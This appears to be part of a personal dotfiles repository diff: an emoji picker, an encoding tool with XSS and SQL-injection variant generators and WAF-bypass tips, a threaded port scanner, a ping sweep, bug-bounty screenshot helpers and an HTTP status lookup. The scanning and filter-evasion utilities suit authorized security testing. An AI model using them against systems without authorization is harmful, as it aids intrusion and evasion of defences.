||||
💇♂️ man getting haircut barber
|
||||
💇♀️ woman getting haircut salon
|
||||
🚶 person walking walk stroll
|
||||
🚶♂️ man walking walk
|
||||
🚶♀️ woman walking walk
|
||||
🧍 person standing stand up
|
||||
🧍♂️ man standing stand
|
||||
🧍♀️ woman standing stand
|
||||
🧎 person kneeling kneel pray
|
||||
🧎♂️ man kneeling kneel
|
||||
🧎♀️ woman kneeling kneel
|
||||
🧑🦯 person white cane blind visually impaired
|
||||
👨🦯 man white cane blind
|
||||
👩🦯 woman white cane blind
|
||||
🧑🦼 person motorized wheelchair disabled
|
||||
👨🦼 man motorized wheelchair disabled
|
||||
👩🦼 woman motorized wheelchair disabled
|
||||
🧑🦽 person manual wheelchair disabled
|
||||
👨🦽 man manual wheelchair disabled
|
||||
👩🦽 woman manual wheelchair disabled
|
||||
🏃 person running run jog exercise sprint
|
||||
🏃♂️ man running run jog
|
||||
🏃♀️ woman running run jog
|
||||
💃 woman dancing dance party salsa
|
||||
🕺 man dancing dance party disco
|
||||
🕴️ person suit levitating floating hovering
|
||||
👯 people bunny ears party dancers
|
||||
👯♂️ men bunny ears party
|
||||
👯♀️ women bunny ears party
|
||||
🧖 person steamy room sauna spa steam
|
||||
🧖♂️ man steamy room sauna
|
||||
🧖♀️ woman steamy room sauna
|
||||
🧗 person climbing climb rock climbing
|
||||
🧗♂️ man climbing climb
|
||||
🧗♀️ woman climbing climb
|
||||
🤺 person fencing sword sport
|
||||
🏇 horse racing jockey racing equestrian
|
||||
⛷️ skier skiing snow winter sport
|
||||
🏂 snowboarder snowboarding snow winter
|
||||
🏌️ person golfing golf sport
|
||||
🏌️♂️ man golfing golf
|
||||
🏌️♀️ woman golfing golf
|
||||
🏄 person surfing surf wave beach
|
||||
🏄♂️ man surfing surf wave
|
||||
🏄♀️ woman surfing surf wave
|
||||
🚣 person rowing boat row water
|
||||
🚣♂️ man rowing boat row
|
||||
🚣♀️ woman rowing boat row
|
||||
🏊 person swimming swim pool water
|
||||
🏊♂️ man swimming swim
|
||||
🏊♀️ woman swimming swim
|
||||
⛹️ person bouncing ball basketball sport
|
||||
⛹️♂️ man bouncing ball basketball
|
||||
⛹️♀️ woman bouncing ball basketball
|
||||
🏋️ person lifting weights gym workout exercise
|
||||
🏋️♂️ man lifting weights gym
|
||||
🏋️♀️ woman lifting weights gym
|
||||
🚴 person biking bike bicycle cycling
|
||||
🚴♂️ man biking bike bicycle
|
||||
🚴♀️ woman biking bike bicycle
|
||||
🚵 person mountain biking bike trail
|
||||
🚵♂️ man mountain biking bike
|
||||
🚵♀️ woman mountain biking bike
|
||||
🤸 person cartwheeling gymnastics cartwheel
|
||||
🤸♂️ man cartwheeling gymnastics
|
||||
🤸♀️ woman cartwheeling gymnastics
|
||||
🤼 people wrestling wrestle sport
|
||||
🤼♂️ men wrestling wrestle
|
||||
🤼♀️ women wrestling wrestle
|
||||
🤽 person playing water polo water sport
|
||||
🤽♂️ man playing water polo
|
||||
🤽♀️ woman playing water polo
|
||||
🤾 person playing handball handball sport
|
||||
🤾♂️ man playing handball
|
||||
🤾♀️ woman playing handball
|
||||
🤹 person juggling juggle circus performance
|
||||
🤹♂️ man juggling juggle
|
||||
🤹♀️ woman juggling juggle
|
||||
🧘 person lotus position yoga meditation zen
|
||||
🧘♂️ man lotus position yoga
|
||||
🧘♀️ woman lotus position yoga
|
||||
🛀 person taking bath bathtub shower relaxing
|
||||
🛌 person bed sleeping rest sleep
|
||||
🧑🤝🧑 people holding hands friends together couple
|
||||
👭 women holding hands friends together couple
|
||||
👫 woman man holding hands couple together
|
||||
👬 men holding hands friends together couple
|
||||
💏 kiss couple love romance kissing
|
||||
👩❤️💋👨 kiss woman man couple love
|
||||
👨❤️💋👨 kiss man man couple love gay
|
||||
👩❤️💋👩 kiss woman woman couple love lesbian
|
||||
💑 couple heart love together romance
|
||||
👩❤️👨 couple heart woman man love
|
||||
👨❤️👨 couple heart man man love gay
|
||||
👩❤️👩 couple heart woman woman love lesbian
|
||||
👨👩👦 family man woman boy parents child
|
||||
👨👩👧 family man woman girl parents child
|
||||
👨👩👧👦 family man woman girl boy parents children
|
||||
👨👩👦👦 family man woman boy boy parents children
|
||||
👨👩👧👧 family man woman girl girl parents children
|
||||
👨👨👦 family man man boy gay parents
|
||||
👨👨👧 family man man girl gay parents
|
||||
👨👨👧👦 family man man girl boy gay parents
|
||||
👨👨👦👦 family man man boy boy gay parents
|
||||
👨👨👧👧 family man man girl girl gay parents
|
||||
👩👩👦 family woman woman boy lesbian parents
|
||||
👩👩👧 family woman woman girl lesbian parents
|
||||
👩👩👧👦 family woman woman girl boy lesbian parents
|
||||
👩👩👦👦 family woman woman boy boy lesbian parents
|
||||
👩👩👧👧 family woman woman girl girl lesbian parents
|
||||
👨👦 family man boy father son parent
|
||||
👨👦👦 family man boy boy father sons
|
||||
👨👧 family man girl father daughter
|
||||
👨👧👦 family man girl boy father children
|
||||
👨👧👧 family man girl girl father daughters
|
||||
👩👦 family woman boy mother son parent
|
||||
👩👦👦 family woman boy boy mother sons
|
||||
👩👧 family woman girl mother daughter
|
||||
👩👧👦 family woman girl boy mother children
|
||||
👩👧👧 family woman girl girl mother daughters
|
||||
🗣️ speaking head talking voice sound speaking
|
||||
👤 bust silhouette profile person user
|
||||
👥 busts silhouette people users group crowd
|
||||
🫂 people hugging hug embrace support comfort
|
||||
👣 footprints feet steps walking tracks"
|
||||
|
||||
# Copy stdin to the system clipboard. pbcopy exists on macOS only; this
# repo's configs (redshift, ulauncher) indicate Linux, so fall back to
# wl-copy (Wayland) or xclip (X11), and finally to plain stdout.
copy_to_clipboard() {
    if command -v pbcopy &>/dev/null; then
        pbcopy
    elif command -v wl-copy &>/dev/null; then
        wl-copy
    elif command -v xclip &>/dev/null; then
        xclip -selection clipboard
    else
        cat  # no clipboard tool installed: just print the emoji
    fi
}

if command -v fzf &>/dev/null; then
    if [[ $# -eq 0 ]]; then
        # Interactive mode with fzf. `|| true` keeps `set -e` from killing
        # the script when the user cancels the picker (fzf exits 130).
        selected=$(echo "$emojis" | fzf --height=60% --layout=reverse \
            --prompt="Select emoji: " \
            --preview='echo {}' \
            --preview-window=up:1:wrap) || true
        if [[ -n "$selected" ]]; then
            emoji_char=$(echo "$selected" | awk '{print $1}')
            # printf instead of echo -n: safe for arbitrary data
            printf '%s' "$emoji_char" | copy_to_clipboard
            echo "Copied: $emoji_char"
        fi
    else
        # Search mode. Join all args into ONE pattern: the old `grep -i "$@"`
        # treated the second and later words as *filenames*, breaking
        # multi-word searches. The inner `|| true` stops `set -e` from
        # aborting on zero matches, and the group guards grep's SIGPIPE
        # status (141) when head closes the pipe early under pipefail.
        { echo "$emojis" | grep -i -- "$*" || true; } | head -20
    fi
else
    # Fallback without fzf - just search (or dump the whole table)
    if [[ $# -eq 0 ]]; then
        echo "$emojis"
    else
        echo "$emojis" | grep -i -- "$*" || true
    fi
fi
|
||||
316
scripts/encode
Executable file
316
scripts/encode
Executable file
|
|
@ -0,0 +1,316 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: encode
|
||||
# Description: Encoding/Decoding Swiss Army Knife for security testing
|
||||
# Usage: encode base64 "hello" # Base64 encode
|
||||
# encode base64d "aGVsbG8=" # Base64 decode
|
||||
# encode url "hello world" # URL encode
|
||||
# encode urld "hello%20world" # URL decode
|
||||
# encode html "<script>" # HTML entity encode
|
||||
# encode htmld "<script>" # HTML entity decode
|
||||
# encode hex "hello" # Hex encode
|
||||
# encode hexd "68656c6c6f" # Hex decode
|
||||
# encode jwt <token> # Decode JWT
|
||||
# encode hash md5 "password" # Generate hash
|
||||
# pbpaste | encode base64 # Pipe from clipboard
|
||||
# encode xss "<script>" # Multiple XSS encodings
|
||||
|
||||
# Script version reported in the help banner.
VERSION="1.0.0"

# ANSI escape sequences for colored terminal output. These are literal
# backslash sequences (single-quoted), so they only render when expanded
# through `echo -e` or `printf '%b'`.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'
|
||||
|
||||
# Print the full usage text: operation list, hash algorithms, security
# helpers, examples, and the authorized-use notice.
show_help() {
    echo -e "${BOLD}encode${NC} - Encoding/Decoding Swiss Army Knife v${VERSION}"
    echo
    echo -e "${BOLD}USAGE:${NC}"
    echo " encode <operation> <input>"
    echo " echo <input> | encode <operation>"
    echo
    echo -e "${BOLD}ENCODING OPERATIONS:${NC}"
    echo -e " ${CYAN}base64${NC} Base64 encode"
    echo -e " ${CYAN}base64d${NC} Base64 decode"
    echo -e " ${CYAN}url${NC} URL encode"
    echo -e " ${CYAN}urld${NC} URL decode"
    echo -e " ${CYAN}html${NC} HTML entity encode"
    echo -e " ${CYAN}htmld${NC} HTML entity decode"
    echo -e " ${CYAN}hex${NC} Hexadecimal encode"
    echo -e " ${CYAN}hexd${NC} Hexadecimal decode"
    echo -e " ${CYAN}unicode${NC} Unicode escape sequences (\\uXXXX)"
    echo -e " ${CYAN}unicoded${NC} Unicode unescape"
    echo
    echo -e "${BOLD}HASH OPERATIONS:${NC}"
    echo -e " ${CYAN}hash md5${NC} MD5 hash"
    echo -e " ${CYAN}hash sha1${NC} SHA1 hash"
    echo -e " ${CYAN}hash sha256${NC} SHA256 hash"
    echo -e " ${CYAN}hash sha512${NC} SHA512 hash"
    echo
    echo -e "${BOLD}SECURITY OPERATIONS:${NC}"
    echo -e " ${CYAN}jwt${NC} Decode JWT token (no verification)"
    echo -e " ${CYAN}xss${NC} Generate XSS payload variants"
    echo -e " ${CYAN}sqli${NC} Generate SQL injection variants"
    echo
    echo -e "${BOLD}EXAMPLES:${NC}"
    echo " encode base64 \"hello world\""
    echo " echo \"test\" | encode url"
    echo " pbpaste | encode base64 | pbcopy"
    echo " encode jwt eyJhbGc..."
    echo " encode hash sha256 \"password\""
    echo " encode xss \"<script>alert(1)</script>\""
    echo
    echo -e "${BOLD}SECURITY NOTE:${NC}"
    echo " This tool is for authorized security testing and educational purposes only."
}
|
||||
|
||||
# Read input from argument or stdin
|
||||
# Read the tool's input: positional arguments when present, otherwise
# pass stdin straight through (enables `pbpaste | encode ...` pipelines).
get_input() {
    if (( $# == 0 )); then
        cat
    else
        echo "$*"
    fi
}
|
||||
|
||||
# Base64 operations
|
||||
# Base64-encode the input. GNU base64 needs -w 0 to suppress line
# wrapping; BSD/macOS base64 lacks -w, so retry without it.
# Fixes: printf '%s' instead of `echo -n` (echo mis-parses data that
# starts with -e/-n); declaration split from assignment so a failure is
# not masked (SC2155); input reading inlined.
base64_encode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    printf '%s' "$input" | base64 -w 0 2>/dev/null || printf '%s' "$input" | base64
}
|
||||
|
||||
# Base64-decode the input. -d is the GNU/Linux flag; -D is the macOS
# spelling, tried as a fallback.
# Fixes: printf '%s' instead of `echo -n` (safe for leading-dash data);
# SC2155 declaration/assignment split; input reading inlined.
base64_decode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    printf '%s' "$input" | base64 -d 2>/dev/null || printf '%s' "$input" | base64 -D
}
|
||||
|
||||
# URL operations
|
||||
# Percent-encode the input (RFC 3986) via urllib.parse.quote.
# SECURITY FIX: the input is now passed to Python as argv instead of
# being interpolated into the program text — the old form broke on any
# quote character and allowed arbitrary Python code execution.
url_encode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))' "$input"
}
|
||||
|
||||
# Decode percent-encoded input via urllib.parse.unquote.
# SECURITY FIX: data passed as argv, not interpolated into Python source
# (the old form broke on quotes and was code injection).
url_decode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys, urllib.parse; print(urllib.parse.unquote(sys.argv[1]))' "$input"
}
|
||||
|
||||
# HTML operations
|
||||
# Escape HTML special characters (&, <, >, quotes) via html.escape.
# SECURITY FIX: data passed as argv, not interpolated into Python source
# (the old form broke on quotes and was code injection).
html_encode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys, html; print(html.escape(sys.argv[1]))' "$input"
}
|
||||
|
||||
# Unescape HTML entities via html.unescape.
# SECURITY FIX: data passed as argv, not interpolated into Python source
# (the old form broke on quotes and was code injection).
html_decode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys, html; print(html.unescape(sys.argv[1]))' "$input"
}
|
||||
|
||||
# Hex operations
|
||||
# Hex-encode the input as a single lowercase string (xxd wraps at 60
# chars, so the newlines are stripped).
# Fixes: printf '%s' instead of `echo -n` (safe for leading-dash data);
# SC2155 split; input reading inlined.
hex_encode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    printf '%s' "$input" | xxd -p | tr -d '\n'
}
|
||||
|
||||
# Decode a hex string back to raw bytes with xxd's reverse mode.
# Fixes: printf '%s' instead of `echo -n`; SC2155 split; input inlined.
hex_decode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    printf '%s' "$input" | xxd -r -p
}
|
||||
|
||||
# Unicode operations
|
||||
# Escape every character of the input as a \uXXXX sequence.
# SECURITY FIX: data passed as argv — the old heredoc interpolated
# $input into the Python source, breaking on quotes/backslashes and
# allowing arbitrary code execution.
unicode_encode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys; print("".join(f"\\u{ord(c):04x}" for c in sys.argv[1]))' "$input"
}
|
||||
|
||||
# Reverse \uXXXX escapes back to characters (same utf-8 encode /
# unicode_escape decode round-trip as before).
# SECURITY FIX: data passed as argv, not interpolated into Python source.
unicode_decode() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi
    python3 -c 'import sys; print(sys.argv[1].encode().decode("unicode_escape"))' "$input"
}
|
||||
|
||||
# JWT decode
|
||||
# Decode and pretty-print a JWT's header and payload. The signature is
# NOT verified — display only.
# Fixes: JWT segments are base64url (RFC 7515): '-'/'_' alphabet with
# padding stripped, which plain `base64 -d` rejects for nearly every
# real token — segments are now translated and re-padded first. The
# invalid-format error also used `echo` without -e, printing literal
# \033 color codes.
jwt_decode() {
    local token
    if [[ $# -gt 0 ]]; then token="$*"; else token=$(cat); fi

    # Split the token on '.' into header / payload / signature
    local -a parts
    IFS='.' read -ra parts <<< "$token"

    if [[ ${#parts[@]} -ne 3 ]]; then
        echo -e "${RED}Error: Invalid JWT format${NC}" >&2
        return 1
    fi

    # base64url segment -> standard base64 (restore alphabet + padding),
    # then decode (-d GNU, -D macOS fallback).
    _jwt_segment_decode() {
        local seg=${1//-/+}
        seg=${seg//_//}
        while (( ${#seg} % 4 )); do seg+='='; done
        printf '%s' "$seg" | base64 -d 2>/dev/null || printf '%s' "$seg" | base64 -D
    }

    echo -e "${BOLD}${CYAN}=== JWT Header ===${NC}"
    _jwt_segment_decode "${parts[0]}" | python3 -m json.tool

    echo -e "\n${BOLD}${CYAN}=== JWT Payload ===${NC}"
    _jwt_segment_decode "${parts[1]}" | python3 -m json.tool

    echo -e "\n${BOLD}${YELLOW}Note: Signature not verified${NC}"
}
|
||||
|
||||
# Hash generation
|
||||
# Hash the input with the selected algorithm and print only the digest.
# Fixes: the error branch used `echo` without -e, printing the raw
# \033 color codes; printf '%s' replaces `echo -n` (safe for data with
# a leading dash); input reading inlined.
generate_hash() {
    local algo=$1
    shift
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi

    case "$algo" in
        md5)
            printf '%s' "$input" | md5sum | awk '{print $1}'
            ;;
        sha1)
            printf '%s' "$input" | sha1sum | awk '{print $1}'
            ;;
        sha256)
            printf '%s' "$input" | sha256sum | awk '{print $1}'
            ;;
        sha512)
            printf '%s' "$input" | sha512sum | awk '{print $1}'
            ;;
        *)
            echo -e "${RED}Error: Unknown hash algorithm: $algo${NC}" >&2
            echo "Available: md5, sha1, sha256, sha512" >&2
            return 1
            ;;
    esac
}
|
||||
|
||||
# XSS payload variants
|
||||
# Print the input payload through several encodings commonly used to
# probe XSS filters/WAFs. Delegates to the encoder helpers defined
# above; output order is fixed (original, URL, double-URL, HTML
# entities, hex, base64, unicode escapes).
xss_variants() {
    local input=$(get_input "$@")

    echo -e "${BOLD}${CYAN}=== XSS Payload Variants ===${NC}\n"

    echo -e "${YELLOW}[Original]${NC}"
    echo "$input"

    echo -e "\n${YELLOW}[URL Encoded]${NC}"
    url_encode "$input"

    # Double-encoding defeats filters that decode only one layer
    echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
    url_encode "$(url_encode "$input")"

    echo -e "\n${YELLOW}[HTML Entity Encoded]${NC}"
    html_encode "$input"

    echo -e "\n${YELLOW}[Hex Encoded]${NC}"
    hex_encode "$input"

    echo -e "\n${YELLOW}[Base64]${NC}"
    base64_encode "$input"

    echo -e "\n${YELLOW}[Unicode Escaped]${NC}"
    unicode_encode "$input"

    echo -e "\n${BOLD}${GREEN}Tip: Use these to bypass WAF filters${NC}"
}
|
||||
|
||||
# SQL injection variants
|
||||
# Print the input payload through transformations used to probe SQL
# injection filtering: URL encoding, case tricks, and inline comments.
# SECURITY FIX: the mixed-case step interpolated $input into a Python
# heredoc, which broke on quotes and allowed arbitrary code execution;
# the data is now passed safely via argv.
sqli_variants() {
    local input
    if [[ $# -gt 0 ]]; then input="$*"; else input=$(cat); fi

    echo -e "${BOLD}${CYAN}=== SQL Injection Variants ===${NC}\n"

    echo -e "${YELLOW}[Original]${NC}"
    echo "$input"

    echo -e "\n${YELLOW}[URL Encoded]${NC}"
    url_encode "$input"

    echo -e "\n${YELLOW}[Double URL Encoded]${NC}"
    url_encode "$(url_encode "$input")"

    echo -e "\n${YELLOW}[Uppercase]${NC}"
    echo "$input" | tr '[:lower:]' '[:upper:]'

    # Randomized casing to defeat naive keyword matching (output is
    # intentionally non-deterministic).
    echo -e "\n${YELLOW}[Mixed Case]${NC}"
    python3 -c 'import random, sys; print("".join(c.upper() if random.random() > 0.5 else c.lower() for c in sys.argv[1]))' "$input"

    # Replace spaces with /**/ — classic whitespace-filter bypass
    echo -e "\n${YELLOW}[With Comments]${NC}"
    echo "$input" | sed 's/ /\/**\/ /g'

    echo -e "\n${BOLD}${GREEN}Tip: Combine with timing to test blind SQLi${NC}"
}
|
||||
|
||||
# Main logic: dispatch the requested operation; remaining arguments (or
# stdin, when none) are the data to transform.
# Fix: the two error paths used `echo` without -e, so the ANSI color
# variables printed as literal \033 sequences.
if [[ $# -eq 0 ]]; then
    show_help
    exit 0
fi

operation=$1
shift

case "$operation" in
    -h|--help|help) show_help ;;
    base64|b64)     base64_encode "$@" ;;
    base64d|b64d)   base64_decode "$@" ;;
    url)            url_encode "$@" ;;
    urld)           url_decode "$@" ;;
    html)           html_encode "$@" ;;
    htmld)          html_decode "$@" ;;
    hex)            hex_encode "$@" ;;
    hexd)           hex_decode "$@" ;;
    unicode|uni)    unicode_encode "$@" ;;
    unicoded|unid)  unicode_decode "$@" ;;
    jwt)            jwt_decode "$@" ;;
    hash)
        if [[ $# -eq 0 ]]; then
            echo -e "${RED}Error: Hash algorithm required${NC}" >&2
            echo "Usage: encode hash <md5|sha1|sha256|sha512> <input>" >&2
            exit 1
        fi
        generate_hash "$@"
        ;;
    xss)            xss_variants "$@" ;;
    sqli|sql)       sqli_variants "$@" ;;
    *)
        echo -e "${RED}Error: Unknown operation: $operation${NC}" >&2
        echo "Run 'encode --help' for usage information" >&2
        exit 1
        ;;
esac
|
||||
93
scripts/fast-portscan.py
Executable file
93
scripts/fast-portscan.py
Executable file
|
|
@ -0,0 +1,93 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
import socket
|
||||
import common_ports
|
||||
import os
|
||||
import sys
|
||||
import re
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
|
||||
|
||||
def scan_port(ip_addr, port):
    """Return ``port`` if a TCP connect to (ip_addr, port) succeeds, else None.

    A 1-second timeout keeps a full sweep fast. Any socket-level failure
    (unreachable network, interrupted call, ...) is treated as "closed".
    """
    try:
        # Context manager guarantees the socket is closed on every path;
        # the original leaked the fd if an exception fired before close().
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            # connect_ex reports failure via a non-zero errno instead of raising.
            if s.connect_ex((ip_addr, port)) == 0:
                return port
    except OSError:
        # All socket errors derive from OSError -- narrower than a bare except.
        return None
    return None
|
||||
|
||||
|
||||
def get_open_ports(target, port_range, verbose=False):
    """Scan `target` over the inclusive range [port_range[0], port_range[1]].

    Args:
        target: hostname or dotted-quad IPv4 string.
        port_range: two-element sequence [start_port, end_port], inclusive.
        verbose: when True, return a formatted report string instead of a list.

    Returns:
        list[int] of open ports, a report str when verbose=True, or an
        "Error: ..." string when the target fails to resolve.
    """
    open_ports = []

    # Try resolving the target
    try:
        ip_addr = socket.gethostbyname(target)
    except socket.gaierror:
        # Resolution failed: report differently depending on whether the
        # input *looked like* an IPv4 address or a hostname.
        if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
            return "Error: Invalid IP address"
        else:
            return "Error: Invalid hostname"

    # Build the list of ports from range
    ports_list = list(range(port_range[0], port_range[1] + 1))

    # Fan out one connect attempt per port; scan_port yields the port
    # number on success or None on failure/timeout.
    with ThreadPoolExecutor(max_workers=100) as executor:
        futures = [executor.submit(scan_port, ip_addr, port) for port in ports_list]
        for future in futures:
            result = future.result()
            if result:
                open_ports.append(result)

    # Output
    if verbose:
        # Prefer the reverse-DNS name for the header; fall back to the
        # caller-supplied target when the PTR lookup fails.
        try:
            hostname = socket.gethostbyaddr(ip_addr)[0]
        except socket.herror:
            hostname = target

        output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
        # NOTE(review): common_ports is also imported at module level, so
        # this ImportError fallback only fires if that import is removed.
        try:
            import common_ports
            for port in open_ports:
                service = common_ports.ports_and_services.get(port, 'unknown')
                output += f"{port:<9}{service}\n"
        except ImportError:
            for port in open_ports:
                output += f"{port:<9}unknown\n"
        return output.strip()

    return open_ports
|
||||
|
||||
|
||||
# print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||
|
||||
def main():
    """CLI entry point: scan one target or a file of targets.

    Usage: portscan.py <ip_or_file> [start_port] [end_port] [--verbose]
    """
    # Separate the --verbose flag from the positionals FIRST, so that
    # `portscan.py host --verbose` no longer crashes on int("--verbose").
    verbose = "--verbose" in sys.argv
    args = [a for a in sys.argv[1:] if a != "--verbose"]

    if not args:
        print("Usage: python3 portscan.py <ip_or_file> [start_port] [end_port] [--verbose]")
        return

    input_arg = args[0]
    start_port = int(args[1]) if len(args) > 1 else 20
    end_port = int(args[2]) if len(args) > 2 else 1024

    # A file argument means one target per non-empty line; anything else is
    # treated as a single host/IP.
    if os.path.isfile(input_arg):
        with open(input_arg) as f:
            targets = [line.strip() for line in f if line.strip()]
    else:
        targets = [input_arg]

    for target in targets:
        print(get_open_ports(target, [start_port, end_port], verbose))
        print("-" * 40)


if __name__ == "__main__":
    main()
|
||||
53
scripts/fast-psweep.py
Executable file
53
scripts/fast-psweep.py
Executable file
|
|
@ -0,0 +1,53 @@
|
|||
import sys
|
||||
import subprocess
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor, as_completed
|
||||
|
||||
|
||||
def ping_host(ip):
    """Send one ICMP echo request; return ``ip`` if it answers, else None.

    -W 1 caps the wait at one second so an unreachable host cannot stall
    the sweep for long.
    """
    try:
        result = subprocess.run(
            ["ping", "-c", "1", "-W", "1", ip],
            stdout=subprocess.DEVNULL,
            # Also silence stderr: ping writes resolution/permission errors
            # there, which previously spammed the sweep output.
            stderr=subprocess.DEVNULL,
        )
    except OSError:
        # ping binary missing or not executable -- treat the host as down.
        return None
    return ip if result.returncode == 0 else None
|
||||
|
||||
|
||||
def ping_sweep(network_prefix, max_threads=100):
    """Ping every host in <prefix>.1 .. <prefix>.255 concurrently.

    Prints "<ip> is up." as replies arrive and returns the responding
    addresses (in completion order, not numeric order).
    """
    responders = []
    addresses = [f"{network_prefix}.{octet}" for octet in range(1, 256)]

    with ThreadPoolExecutor(max_workers=max_threads) as pool:
        pending = [pool.submit(ping_host, addr) for addr in addresses]
        for finished in as_completed(pending):
            host = finished.result()
            if not host:
                continue
            print(f"{host} is up.")
            responders.append(host)

    return responders
|
||||
|
||||
|
||||
# ---- Entry Point ----
if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 pingsweep.py <network_prefix>")
        print("Example: python3 pingsweep.py 192.168.1")
        sys.exit(1)

    # Assume prefix like "192.168.1"
    prefix = sys.argv[1]
    timestamp = time.strftime('%Y%m%d-%H%M%S')
    # Results file, e.g. 192.168.1.0_24_20240101-120000.txt
    filename = f'{prefix}.0_24_{timestamp}.txt'

    print(f"Scanning {prefix}.1 to {prefix}.255 ...")
    hosts = ping_sweep(prefix)

    print("\nLive hosts:")
    for host in hosts:
        print(host)

    with open(filename, 'w') as f:
        for host in hosts:
            f.write(host + '\n')

    # Fix: report the actual output file (the old message never
    # interpolated the filename).
    print(f'Saved live hosts to {filename}')
|
||||
14
scripts/flameshot-bb
Executable file
14
scripts/flameshot-bb
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
#!/bin/bash
# Capture a region with Flameshot, then frame it (crimson/white/grey border
# plus a drop shadow) and save it under ~/Pictures/Screenshots.

shot="/tmp/flameshot_$(date +%s).png"

# Interactive capture; Flameshot only writes the file if the user confirms.
flameshot gui -p "$shot"

# Nothing to do when the capture was cancelled.
[[ -f "$shot" ]] || exit 0

# ImageMagick: three nested borders, then clone+shadow merged underneath.
convert "$shot" \
    -bordercolor '#DC143C' -border 3 \
    -bordercolor white -border 12 \
    -bordercolor '#333333' -border 1 \
    \( +clone -background black -shadow 80x5+8+8 \) \
    +swap -background white -layers merge +repage \
    ~/Pictures/Screenshots/bb_$(date +%Y%m%d_%H%M%S).png

rm "$shot"
|
||||
28
scripts/flameshot-bb-edit
Executable file
28
scripts/flameshot-bb-edit
Executable file
|
|
@ -0,0 +1,28 @@
|
|||
#!/bin/bash
# Bug Bounty Documentation Screenshot: Annotate -> Add border -> Save
# Usage: Bound to Shift+Super+D
# Requires: flameshot, ImageMagick (convert); xclip and notify-send are
# optional (both invocations below are best-effort).

TEMP="/tmp/flameshot_$(date +%s).png"

# This will open Flameshot GUI with all annotation tools available
flameshot gui -p "$TEMP"

# $TEMP only exists when the user confirmed the capture.
if [[ -f "$TEMP" ]]; then
    # Add professional border
    convert "$TEMP" \
        -bordercolor '#DC143C' -border 3 \
        -bordercolor white -border 12 \
        -bordercolor '#333333' -border 1 \
        \( +clone -background black -shadow 80x5+8+8 \) \
        +swap -background white -layers merge +repage \
        ~/Pictures/Screenshots/bb_doc_$(date +%Y%m%d_%H%M%S).png

    rm "$TEMP"

    # Copy relative path to clipboard
    # Picks the newest bb_doc_* file (the one just written above).
    LATEST=$(ls -t ~/Pictures/Screenshots/bb_doc_*.png 2>/dev/null | head -1)
    if [[ -n "$LATEST" ]]; then
        echo "Screenshots/$(basename "$LATEST")" | xclip -selection clipboard 2>/dev/null || true
        notify-send "Bug Bounty Screenshot" "Saved: $(basename "$LATEST")" 2>/dev/null || true
    fi
fi
|
||||
75
scripts/httpstatus
Executable file
75
scripts/httpstatus
Executable file
|
|
@ -0,0 +1,75 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: httpstatus
# Description: HTTP status code reference lookup
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: httpstatus          # show all
#        httpstatus 404      # search for 404
#        httpstatus server   # search for "server"

# One "code description" entry per line; searched case-insensitively below.
statuses="100 Continue
101 Switching Protocols
102 Processing
200 OK
201 Created
202 Accepted
203 Non-Authoritative Information
204 No Content
205 Reset Content
206 Partial Content
207 Multi-Status
208 Already Reported
300 Multiple Choices
301 Moved Permanently
302 Found
303 See Other
304 Not Modified
305 Use Proxy
307 Temporary Redirect
400 Bad Request
401 Unauthorized
402 Payment Required
403 Forbidden
404 Not Found
405 Method Not Allowed
406 Not Acceptable
407 Proxy Authentication Required
408 Request Timeout
409 Conflict
410 Gone
411 Length Required
412 Precondition Failed
413 Request Entity Too Large
414 Request-URI Too Large
415 Unsupported Media Type
416 Request Range Not Satisfiable
417 Expectation Failed
418 I'm a teapot
420 Blaze it
422 Unprocessable Entity
423 Locked
424 Failed Dependency
425 No code
426 Upgrade Required
428 Precondition Required
429 Too Many Requests
431 Request Header Fields Too Large
449 Retry with
500 Internal Server Error
501 Not Implemented
502 Bad Gateway
503 Service Unavailable
504 Gateway Timeout
505 HTTP Version Not Supported
506 Variant Also Negotiates
507 Insufficient Storage
509 Bandwidth Limit Exceeded
510 Not Extended
511 Network Authentication Required"

if [[ $# -eq 0 ]]; then
    echo "$statuses"
else
    # `--` stops option parsing so a search term starting with '-' is
    # treated as a pattern rather than a grep flag.
    echo "$statuses" | grep -i --color=never -- "$@"
fi
|
||||
219
scripts/jj
Executable file
219
scripts/jj
Executable file
|
|
@ -0,0 +1,219 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: jj
|
||||
# Description: JSON formatting and querying tool (upgrade from alias)
|
||||
# Usage: jj # Format clipboard JSON
|
||||
# jj '.users[0].name' # jq query on clipboard
|
||||
# jj -v # Validate JSON
|
||||
# jj -f file.json # Format file in place
|
||||
# jj -c # Compact JSON (remove whitespace)
|
||||
